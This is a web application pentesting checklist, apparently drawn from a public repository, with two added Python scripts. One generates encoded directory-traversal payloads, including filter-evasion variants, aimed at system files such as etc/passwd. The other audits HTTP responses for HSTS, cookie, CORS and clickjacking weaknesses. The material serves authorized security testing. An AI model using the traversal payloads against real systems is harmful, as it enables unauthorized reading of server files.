Web Application Pentesting Checklist:

Information Gathering

  1. Open Source Reconnaissance
  2. Fingerprinting Web Server
  3. Looking for Metafiles
  4. Enumerating Web Server’s Applications
  5. Review the Web Contents
  6. Identifying Application’s Entry Points
  7. Mapping Execution Paths
  8. Fingerprint Web Application Framework
  9. Map Application Architecture

Configuration & Deployment Management

  1. Test Network Configuration
  2. Test Application Configuration
  3. Test File Extension Handling
  4. Review Backup & Unreferenced Files
  5. Enumerate Infrastructure & Admin Interfaces
  6. Test HTTP Methods
  7. Test HSTS (Strict Transport Security)
  8. Test RIA Cross Domain Policy
  9. Test File Permission
  10. Test For Subdomain Takeover
  11. Test Cloud Storage

Identity Management

  1. Test Role Definitions
  2. Test User Registration Process
  3. Test Account Provisioning Process
  4. Testing For Account Enumeration
  5. Test For Weak Username Policy

Authentication Testing

  1. Test For Unencrypted (HTTP) Channel
  2. Test For Default Credentials
  3. Test For Weak Lockout Mechanism
  4. Test For Bypassing Authentication Schema
  5. Test For Vulnerable Remember Password
  6. Test For Browser Cache Weakness
  7. Test For Weak Password Policy
  8. Test For Weak Security Questions
  9. Test For Weak Password Reset Function
  10. Test For Weak Password Change Function
  11. Test For Weak Authentication In Alternative Channel

Authorization Testing

  1. Test Directory Traversal / File Include
  2. Test Traversal With Encoding
  3. Test Traversal With Different OS Schemes
  4. Test Other Encoding Techniques
  5. Test Authorization Schema Bypass
  6. Test For Privilege Escalation
  7. Test For Insecure Direct Object Reference
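The three traversal items above (plain traversal, traversal with encoding, different OS path schemes) are usually worked through with a small payload generator rather than by hand. The script below is an added example, not part of the original checklist: it builds the common encoded variants of `../` (and the Windows `..\` form), and models a deliberately weak front-end filter (URL-decode once, strip literal `../` in a single pass) in front of a backend that decodes a second time, so you can see which variants survive and why. The filter and backend are assumptions that stand in for a real proxy/application pair; nothing is sent to a target.

```python
"""Encoded directory-traversal variants plus a model of a weak filter.

Added example for the traversal checklist items; constructed inputs only,
no target is contacted.
"""
import urllib.parse


def percent_encode(s: str) -> str:
    """Percent-encode every byte: '../' -> '%2E%2E%2F'."""
    return "".join(f"%{b:02X}" for b in s.encode("utf-8"))


def overlong_utf8(s: str) -> str:
    """Non-shortest-form (overlong) 2-byte UTF-8 for each ASCII byte,
    e.g. '/' (0x2F) -> %C0%AF. Strict decoders reject it; lenient decoders
    map it back to '/', which is what the classic IIS traversal abused."""
    return "".join(f"%{0xC0 | (b >> 6):02X}%{0x80 | (b & 0x3F):02X}"
                   for b in s.encode("ascii"))


def traversal_payloads(depth: int, target: str, os_style: str = "unix") -> dict:
    """Return encoding-name -> path that climbs `depth` directories and then
    appends `target` unchanged (e.g. 'etc/passwd' or 'Windows\\win.ini').
    os_style 'unix' uses '/', anything else uses the Windows '\\' separator."""
    sep = "/" if os_style == "unix" else "\\"
    seg = ".." + sep
    variants = {
        "plain": seg,
        "url": percent_encode(seg),                              # %2E%2E%2F
        "double_url": percent_encode(seg).replace("%", "%25"),   # %252E%252E%252F, for decode-twice backends
        "overlong_utf8": overlong_utf8(seg),                     # %C0%AE%C0%AE%C0%AF
        "mixed": ".." + percent_encode(sep),                     # ..%2F, beats literal '../' string matches
        "filter_strip": "...." + sep + sep,                      # '....//' becomes '../' after one strip pass
    }
    return {name: v * depth + target for name, v in variants.items()}


def naive_filter(path: str) -> str:
    """Model (assumption) of a weak front-end check: URL-decode once, then
    strip every literal '../' in a single, non-recursive pass."""
    return urllib.parse.unquote(path).replace("../", "")


def backend_view(path: str) -> str:
    """What a backend that URL-decodes its input a second time will open.
    Python's unquote is strict UTF-8 with errors='replace', so overlong
    sequences come out as U+FFFD here rather than as '/'."""
    return urllib.parse.unquote(path)


def resolve_after_filter(payload: str) -> str:
    """Path the modelled backend resolves once the filter has run."""
    return backend_view(naive_filter(payload))


if __name__ == "__main__":
    for name, p in traversal_payloads(2, "etc/passwd").items():
        print(f"{name:14} {p:44} -> {resolve_after_filter(p)!r}")
```

Read the output column against the "Traversal With Encoding" item: the plain and single-encoded forms are neutralised by the modelled filter, while double encoding and the `....//` collapse trick reach the backend as `../../etc/passwd`. Which of these works against a real target depends entirely on how many decode passes and which normalisation steps sit between the request and the filesystem call, so test each variant rather than stopping at the first one that is blocked.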

Session Management Testing

  1. Test For Session Management Schema
  2. Test For Cookie Attributes
  3. Test For Session Fixation
  4. Test For Exposed Session Variables
  5. Test For Back Refresh Attack
  6. Test For Cross Site Request Forgery (CSRF)
  7. Test For Logout Functionality
  8. Test For Session Timeout
  9. Test For Session Puzzling
  10. Test For Session Hijacking

Input Validation Testing

  1. Test For Reflected Cross Site Scripting (Reflected XSS)
  2. Test For Stored Cross Site Scripting (Stored XSS)
  3. Test For HTTP Parameter Pollution
  4. Test For SQL injection
  5. Test For LDAP Injection
  6. Testing For XML injection
  7. Test For Server Side Includes
  8. Test For XPATH Injection
  9. Test For IMAP/SMTP Injection
  10. Test For Local File Inclusion
  11. Test For Remote File Inclusion
  12. Test For Command Injection
  13. Test For Format String Injection
  14. Test For Host Header Injection
  15. Test For Server Side Request Forgery (SSRF)
  16. Test For Server Side Template Injection

Error Handling Testing

  1. Test For Improper Error Handling

Weak Cryptography Testing

  1. Test For Weak Transport Layer Security

Business Logic Testing

  1. Test For Business Logic
  2. Test For Malicious File Upload

Client Side Testing

  1. Test For DOM Based XSS
  2. Test For URL Redirect
  3. Test For Cross Origin Resource Sharing
  4. Test For Clickjacking
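Several items on this list are answered by reading one HTTP response carefully: "Test HSTS" (Configuration & Deployment Management), "Test For Cookie Attributes" (Session Management) and the CORS and Clickjacking items just above. The auditor below is an added example, not code from the original checklist: it parses a raw HTTP/1.x response, applies those four checks and returns a list of findings. The two sample responses are constructed inline, the `sent_origin` argument models the `Origin` header the tester sent when probing CORS, and the one-year `max-age` threshold is the common HSTS recommendation, all of which are assumptions of this example.

```python
"""Audit a captured HTTP response for the HSTS, cookie-attribute, CORS and
clickjacking checklist items. Added example; the responses are constructed
samples and nothing is fetched from a network."""
import re

ONE_YEAR = 31536000  # HSTS max-age threshold used here (assumption)


def parse_response(raw: str):
    """Split a raw HTTP/1.x response into its status line and a list of
    (lowercased-name, value) pairs; a list, because Set-Cookie may repeat."""
    head = raw.split("\r\n\r\n", 1)[0]
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return status, headers


def values(headers, name):
    return [v for n, v in headers if n == name]


def check_hsts(headers):
    hsts = values(headers, "strict-transport-security")
    if not hsts:
        return ["HSTS: header missing"]
    findings = []
    m = re.search(r"max-age=(\d+)", hsts[0], re.I)
    if not m:
        findings.append("HSTS: no max-age directive")
    elif int(m.group(1)) < ONE_YEAR:
        findings.append(f"HSTS: max-age {m.group(1)} is below one year")
    if "includesubdomains" not in hsts[0].lower():
        findings.append("HSTS: includeSubDomains not set")
    return findings


def check_clickjacking(headers):
    xfo = [v.upper() for v in values(headers, "x-frame-options")]
    csp = " ".join(values(headers, "content-security-policy")).lower()
    if "frame-ancestors" in csp or any(v in ("DENY", "SAMEORIGIN") for v in xfo):
        return []
    return ["Clickjacking: no X-Frame-Options DENY/SAMEORIGIN and no CSP frame-ancestors"]


def check_cors(headers, sent_origin=None):
    """Flag the two dangerous credentialed combinations: the 'null' origin
    (reachable from a sandboxed iframe) and reflection of whatever Origin
    the tester sent."""
    acao = values(headers, "access-control-allow-origin")
    if not acao:
        return []
    allow_creds = any(v.lower() == "true"
                      for v in values(headers, "access-control-allow-credentials"))
    if acao[0] == "null" and allow_creds:
        return ["CORS: 'null' origin allowed with credentials"]
    if sent_origin and acao[0] == sent_origin and allow_creds:
        return [f"CORS: arbitrary Origin {sent_origin} reflected with credentials"]
    return []


NEEDED_COOKIE_FLAGS = {"secure": "Secure", "httponly": "HttpOnly", "samesite": "SameSite"}


def check_cookies(headers):
    findings = []
    for raw in values(headers, "set-cookie"):
        name_value, *attrs = [p.strip() for p in raw.split(";")]
        name = name_value.split("=", 1)[0]
        present = {a.split("=", 1)[0].lower() for a in attrs}
        for key, label in NEEDED_COOKIE_FLAGS.items():
            if key not in present:
                findings.append(f"Cookie {name!r}: missing {label}")
    return findings


def audit(raw: str, sent_origin=None):
    _, headers = parse_response(raw)
    return (check_hsts(headers) + check_clickjacking(headers)
            + check_cors(headers, sent_origin) + check_cookies(headers))


# Constructed sample responses (not captured from any real host).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Strict-Transport-Security: max-age=86400\r\n"
    "Access-Control-Allow-Origin: https://attacker.example\r\n"
    "Access-Control-Allow-Credentials: true\r\n"
    "Set-Cookie: session=abc123; Path=/\r\n"
    "Set-Cookie: theme=dark; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "\r\n<html>...</html>"
)

HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Content-Security-Policy: frame-ancestors 'none'\r\n"
    "Set-Cookie: session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "\r\n<html>...</html>"
)

if __name__ == "__main__":
    for finding in audit(WEAK_RESPONSE, sent_origin="https://attacker.example"):
        print(finding)
    print("hardened:", audit(HARDENED_RESPONSE) or "no findings")
```

Run it with a response saved from your proxy in place of the constructed samples. The CORS check deliberately needs the `Origin` you sent: an `Access-Control-Allow-Origin` that merely names a third party is not a finding on its own, while one that echoes an arbitrary value together with `Access-Control-Allow-Credentials: true` lets any site read the authenticated response.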

Other Common Issues

  1. Test For Missing Rate Limiting
  2. Test For Exif Geodata
  3. Test For Broken Link Hijacking
  4. Test For Missing or Weak SPF Record
  5. Test For Weak 2FA
  6. Test For Weak OTP Implementation

(Ref: https://github.com/Hari-prasaanth/Web-App-Pentest-Checklist)